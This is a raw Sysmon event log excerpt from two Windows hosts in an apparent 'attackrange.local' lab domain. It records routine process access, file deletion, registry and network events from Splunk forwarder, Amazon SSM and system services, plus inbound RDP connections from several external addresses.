09:11:56.034{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.034{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.034{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.034{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8ADC-6151-387A-00000000FC01}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.034{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8ADC-6151-387A-00000000FC01}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.020{5EBD8912-8ADC-6151-387A-00000000FC01}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:57.801{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=141287C58DB63443BA074167658A6A01,SHA256=F957252524CAFAEEA112A8D4A24CC0F236E4E2B9F1F42F210941F318C2B16925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:57.801{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BFE5824FE931194EEC46EF42ABDC87F,SHA256=63861C37E5175CA78F8E50DAFCD5AB4C78D31F88401EADCAE80D51E3C584A74B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978850Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:57.617{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24AE7BB370935CCDCEEE5176AB3BBD94,SHA256=7921F0B613C835225B78FBF92B1CEFF3CAF27863B50274A54954A9734A5FC250,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.175{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54098-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:58.850{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12A9DB2995F2B8371E0B2AC579409D2,SHA256=2ACDC6E8CD9B33FD05ADA97351B3C3CB2EE4F55FFCAACD8360704CEFA86524EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978852Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:58.632{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C5B28A2C489805E1465852BA524E3C9,SHA256=F641DC9A7EC38B22E710A01C95177D7782DBD8ED27CEDBD8566354E7A1F2CB34,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.789{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53368-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000978851Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:55.806{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59386-false10.0.1.12-8000- 23542300x80000000000000001050232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:59.880{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D869D08626756118654816642A35CF7,SHA256=22DDD755257D6488BF217257D4D61329BCFB5EDF272EDA9538A44B774AB5125B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000978863Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000978862Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fce5813) 13241300x8000000000000000978861Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b377-0x582aa812) 13241300x8000000000000000978860Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0xb9ef1012) 13241300x8000000000000000978859Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0x1bb37812) 13241300x8000000000000000978858Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000978857Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fce5813) 13241300x8000000000000000978856Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b377-0x582aa812) 13241300x8000000000000000978855Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0xb9ef1012) 13241300x8000000000000000978854Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:11:59.851{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0x1bb37812) 23542300x8000000000000000978853Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:59.632{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7522B5BEA5288453FFCC5F36F507D3DC,SHA256=C8A64B1843A83117AFC44F94C14106B05825255661E225CC6835ECAF40BF736E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:59.799{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=113ADB96EF4D89969DA6EE27629A9D52,SHA256=775525EE175C118D006C53351B9EE55469FAD4E1FAB95CB5863F4B2CFCAF91D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:57.308{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse103.24.1.102-62998-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978864Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:00.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C064B298351A83B4ED3CDA1F2649C2,SHA256=D193401FE74E90DECEC1163213EC5BF37F257C208D3C6EE6ECD851183910B4ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:00.917{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE0FA1F7A16933496462F6FB6F199732,SHA256=3EE68CFF2C062287AA06E6976FE7D873E9631DA4BF181C9B38225778AE5D8723,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:58.177{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60604-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978865Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:01.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7E40F1397A62AA42F66E19A2F1FD91A,SHA256=67E3A694170BE415F3C1A52F8E833E687DE4B5162F52B139BE74FAF96F19D434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:01.931{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0F5E557DE3C3DC9E77F35FEFA80D31F,SHA256=53ED2CD9B1A13FD3D3988BB7ADF89DE0A5CE22EABBE9C7ACBF660FF91E9C7418,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:02.946{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47EFA0F9C907A2068328CCFA9D68A7A7,SHA256=BDEFB7DB513E631D86CBD80211E7E88CACED6350C6CD0A1E6AB353C310CB8646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978866Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:02.664{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FF5F22A6AE399708F591B3036DCFD6F,SHA256=CD14D86B8BDE445E89EE526B14A6950775429D845883C0DF16209F54B7ED9BE8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:01.231{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de62631-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978871Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:03.919{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=932E8FB87ADCCD918FF4C3E4AEA542F0,SHA256=F2CC8213E5A895C1F65291C0BBFA7C263258D4E9E5C4217D5A1EB29126E87F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978870Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:03.919{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB557EFD39090CA4D3D21DA7FEEA77BE,SHA256=E2691FE72672CA760010337E6AEEA4A07DFFE0DEC2A393E46962F913EEEB9FCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978869Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:03.734{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4308MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978868Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:03.670{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E7B153AAC6FA8AA87FE2C2A844A3239,SHA256=FD8656B31766564B672DB4AD356C7EDA5383528038DD46D7A08624FECFA4B44D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:03.961{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D04524FF4FA91B22B928A71AD73D726D,SHA256=119BD7692E90CFE516D93F017BBCC862C1C51BCD28FE4A3C1EE190A6788E6927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:03.297{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=062D30E57B3BF62AD17F530CC9737D32,SHA256=3EF96EB414CA4846CDDAA69D7B2AC7FCB723126A992D4E97AF412FD18F81D171,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978867Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:00.935{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57669-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:04.976{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0106485F7055F56498221C87E54DE253,SHA256=A75680811E220AAAB859B11AA1050934337FC4EA5932BF5B8A52F9AF08254C54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978873Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:04.749{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4309MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978872Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:04.685{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A993DCDE20F257783DD478ED6EE7B005,SHA256=B454573FC109D19A3A47DE516129602CB5054FA215E3B5F95E15C3B03B5E35E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:02.785{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53369-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:05.994{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61683386C6A97543724C22DF02D3903A,SHA256=E202E4424BFD9A7629E56199573594C30B5FF7546A05979863EEFB58F5048DA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978875Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:01.779{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59387-false10.0.1.12-8000- 23542300x8000000000000000978874Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:05.686{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10D36CE6CC755645056E5A4DA7AC6BB5,SHA256=83874296CF78271D13D20C980CB3C8C6416678EFCF92682A47E1DBFBB329170D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978877Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:06.795{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=932E8FB87ADCCD918FF4C3E4AEA542F0,SHA256=F2CC8213E5A895C1F65291C0BBFA7C263258D4E9E5C4217D5A1EB29126E87F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978876Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:06.701{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A29A63AE923F46FDE272F3A53B9462E,SHA256=C3AD31B264BFA0FD6C8F7BF6E8AD2CE398158FFD6D9E12641C56D26F0FE9CAFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:05.102{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 